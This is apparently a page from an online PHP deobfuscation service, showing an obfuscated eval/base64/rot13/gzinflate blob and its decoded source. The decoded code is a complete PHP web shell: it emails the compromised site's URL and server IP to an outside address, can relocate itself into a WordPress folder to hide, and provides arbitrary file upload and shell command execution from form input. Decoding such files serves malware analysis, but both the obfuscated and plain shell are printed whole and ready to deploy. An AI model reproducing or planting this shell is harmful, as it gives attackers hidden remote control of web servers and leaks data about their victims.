Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(str_rot13(base64_decode('rUh6QuNTEP5cpPsPyzaSHR04XKtXJ8DoKJgStRAaJ/0CyNrYm3..

Decoded Output download

error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-simple.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>UnKnown - Simple Shell</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

Did this file decode correctly?

Original Code

eval(gzinflate(str_rot13(base64_decode('rUh6QuNTEP5cpPsPyzaSHR04XKtXJ8DoKJgStRAaJ/0CyNrYm3EPe3rtrsmliP/emV07JAdUdmj5EnTmbOblmfGEK0iqUfGqR1PImb/XPWu3JabE3xZNZuNqkjiK4/7g8tqbsM/szrvtaX9ra7fVuRdNmLSspSEh2QNFdMEn8IiE4V/R8Jqej1NKyfkgHtFbZwv5bMM9jP4cVPEoGQ/7DjApsyUgKMsYTDI5I8DgqSE3ElAjnyJZsykv9jIO0EJPinEGSG11WYoy496q/hWwWB46mqe1EnMJ4ePjsyi5GJxTEGBjaVMPHt968VzzSkOXALKpuaq4CiHjvNRzspSs4P6qI899J8enp1CQqemZ35lFTpBikYbRxWAUrZEKJmWfut5uKFkB89MMrU5NFmeHQ6sU3aHnWYuc/IpwbpLMjan2e71JK0OteudT9q9VzNU9x0+aLmEkAXi/VgPmtkl3K3829nPKQm89ULx/YkgSRr9dnd+i0bWX5qXkuDa4NbqsSMrX98CLQob9q0Rl1v8jujy+iDy7CxnXU5DwCWg6OBlfUZejcTgYjLzbgPYW1a6Qdl4DFJ+1KKqcB9W8wi1E3Mns8u0QF7DrGviOK7T/phXaaisEoGdeEm11hMn50Uv+LsuFJLsktrWTa87z/LDnvIcTaISdNJR2CS+aFn/z8CeSljlZ7MeP9gPAIxqs8gb0sDdMkTtgWXcYa1V9GkCbCRhAG3CNfjeg3bfmGAMBGqlSFtpVxRIeIcIqUkDJ7Mk5+9q5Xtab8uEAISHFkSa1HXRqM8y0lqkRpSTVApIR3K9nkblqLVKT28ZBHXejR0h3H/07Xs+zy3Vd2+jLubSu7u4HZyhhdyUJTQIAt9N9S7PbWmLsL6W4ufkvOQD97SRaIpTMA8lHTgo8JaD0Fd5JwqwGIaVUrwttRRYFk0wr4KGQSHqITEk8pIZ/MZSgxiFai4xhbeNtRYgnv4tQyT3LePv7DvA9rOzIO9islMOAeYiizo2omDIWt5sxw9rK22mwm392blzlJcvImci5eqOH6HTdzFKWZNlHq13tG4Ap8Bs37ib+pFrOjy7aq0hc8oVy75P1Itbio5qO/eGXJo/kC3ygJM2Z1qFuGwRKceOjE7PS1jW8Ie/abFLFrj1UYQ95ehmZwFhfPb0D2x1bVMt2ygHSg2jYg4wXOL72TVa8W8BMkN3DorzniYvOswQB/osURkeJo8HVXUgT2DRaMd8lFGnr7lW7FfAPyTO8C4/EHXCy4Y/rNOVNEwOm4OtjY7z2Qgk9II/2ensmZbP0rcrwjkvJGnSR2X+t5qxIiq9i0M/tBu3ZDxx4jWo+4V9r6nAke9XcEvWQWNf/c8n/COrlmuzmzHsx8D8='))));

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 ee19d62438c8410b264fc769ea63250f
Eval Count 1
Decode Time 76 ms